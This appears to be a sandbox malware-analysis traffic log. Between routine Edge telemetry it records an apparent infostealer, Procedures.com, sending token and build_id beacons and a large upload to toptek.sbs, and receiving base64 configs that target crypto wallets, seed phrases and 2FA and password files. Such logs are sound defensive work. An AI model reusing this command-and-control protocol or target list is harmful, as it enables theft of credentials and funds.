                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 59 35 58 54 52 39 48 44 42 53 4a 4d 59 55 41 41 31 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 59 35 58 54 52 39 48 44 42 53 4a 4d 59 55 41 41 31 44 32 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 59 35 58 54 52 39 48 44 42 53 4a 4d 59 55 41 41 31 44 32 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------Y5XTR9HDBSJMYUAA1D2DContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------Y5XTR9HDBSJMYUAA1D2DContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Y5XTR9HDBSJMYUAA1D2DCont
2024-12-23 05:24:42 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:42 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:42 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50033 | 20.42.73.24 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:43 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931480676&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 11942
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:43 UTC11942OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 33 54 30 35 3a 32 34 3a 34 30 2e 36 37 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 66 38 66 35 39 31 39 39 2d 31 66 61 64 2d 34 64 64 65 2d 61 38 64 63 2d 37 37 65 62 36 30 66 62 64 66 32 36 22 2c 22 65 70 6f 63 68 22 3a 22 34 31 35 33 32 34 30 31 37 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:24:40.674Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"locale
2024-12-23 05:24:43 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=46a7d321a3df40fabc52c396ccc5ef4f&HASH=46a7&LV=202412&V=4&LU=1734931483293; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=d1f307fcfd6f471598b057ca139a576a; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2617
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:42 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50034 | 20.42.73.24 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:43 UTC | 1043 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931480679&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5219
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-23 05:24:43 UTC | 5219 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:24:40.678Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"locale
2024-12-23 05:24:43 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=c3a79819f97b4caabd2a97c9389ec22e&HASH=c3a7&LV=202412&V=4&LU=1734931483305; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:43 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=09678385ed254448867ba268cec1623b; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:43 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2626
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 23 Dec 2024 05:24:43 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50035 | 20.42.73.24 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:44 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931481529&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5417
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; msnup=
2024-12-23 05:24:44 UTC | 5417 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-23T05:24:41.528Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"locale
2024-12-23 05:24:44 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=12aed432e05749129839a69b25b1d5c1&HASH=12ae&LV=202412&V=4&LU=1734931484178; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:44 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=622e398bca314229bac5b66bec8fc524; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:44 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2649
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 23 Dec 2024 05:24:43 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 50037 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:44 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----K6XT0ZUSR1N7YU3WT26P
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-23 05:24:44 UTC | 331 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------K6XT0ZUSR1N7YU3WT26PContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------K6XT0ZUSR1N7YU3WT26PContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------K6XT0ZUSR1N7YU3WT26PCont
2024-12-23 05:24:44 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:44 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-23 05:24:44 UTC | 1524 | IN
                                                                                                                                                                                                                                                                                                  Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 50036 | 20.42.73.24 | 443 | 6772 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:44 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734931481674&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 9876
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=2DB99B69D85C6DF817C28E37D9F46CAD; _EDGE_S=F=1&SID=0A0B2915223862D112663C4B235E6391; _EDGE_V=1; msnup=
2024-12-23 05:24:44 UTC | 9876 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-23T05:24:41.673Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"f8f59199-1fad-4dde-a8dc-77eb60fbdf26","epoch":"4153240178"},"app":{"loc
2024-12-23 05:24:44 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=99fbc087c21545c4b9e1fc256f6387ff&HASH=99fb&LV=202412&V=4&LU=1734931484355; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:24:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=190a28ee68cc447ea409b39585e1c5c4; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 05:54:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                  time-delta-millis: 2681
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:44 GMT
                                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 50044 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:46 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----O8GDJEKN7YCJEUK6P8GV
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 453
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-12-23 05:24:46 UTC | 453 | OUT
                                                                                                                                                                                                                                                                                                  Data Ascii: ------O8GDJEKN7YCJEUK6P8GVContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------O8GDJEKN7YCJEUK6P8GVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------O8GDJEKN7YCJEUK6P8GVCont
2024-12-23 05:24:47 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:47 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
2024-12-23 05:24:47 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 50056 | 94.130.188.57 | 443 | 1576 | C:\Users\user\AppData\Local\Temp\139308\Procedures.com
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:24:49 UTC | 324 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----4WT2VKNOZMO8QIWT2VSR
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 98233
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:49 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 34 57 54 32 56 4b 4e 4f 5a 4d 4f 38 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------4WT2VKNOZMO8QIWT2VSRContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------4WT2VKNOZMO8QIWT2VSRContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------4WT2VKNOZMO8QIWT2VSRCont

Timestamp: 2024-12-23 05:24:51 UTC
Bytes transferred: 158
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-12-23 05:24:51 UTC
Bytes transferred: 12
Direction: IN
Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID: 45
Source IP: 192.168.2.5
Source Port: 50067
Destination IP: 94.130.188.57
Destination Port: 443
PID: 1576
Process: C:\Users\user\AppData\Local\Temp\139308\Procedures.com

Timestamp: 2024-12-23 05:24:52 UTC
Bytes transferred: 322
Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----58Y5FK6F37QIE37Q1NGL
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

Timestamp: 2024-12-23 05:24:52 UTC
Bytes transferred: 331
Direction: OUT
Data Raw: 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 35 38 59 35 46 4b 36 46 33 37 51 49 45 33 37 51 31 4e 47 4c 0d 0a 43 6f 6e 74
Data Ascii: ------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------58Y5FK6F37QIE37Q1NGLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------58Y5FK6F37QIE37Q1NGLCont

Timestamp: 2024-12-23 05:24:53 UTC
Bytes transferred: 158
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:24:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-12-23 05:24:53 UTC
Bytes transferred: 5
Direction: IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 46
Source IP: 192.168.2.5
Source Port: 50076
Destination IP: 94.130.188.57
Destination Port: 443
PID: 1576
Process: C:\Users\user\AppData\Local\Temp\139308\Procedures.com

Timestamp: 2024-12-23 05:24:54 UTC
Bytes transferred: 322
Direction: OUT
Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7YCBIE37YCBAIEC26FCB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache

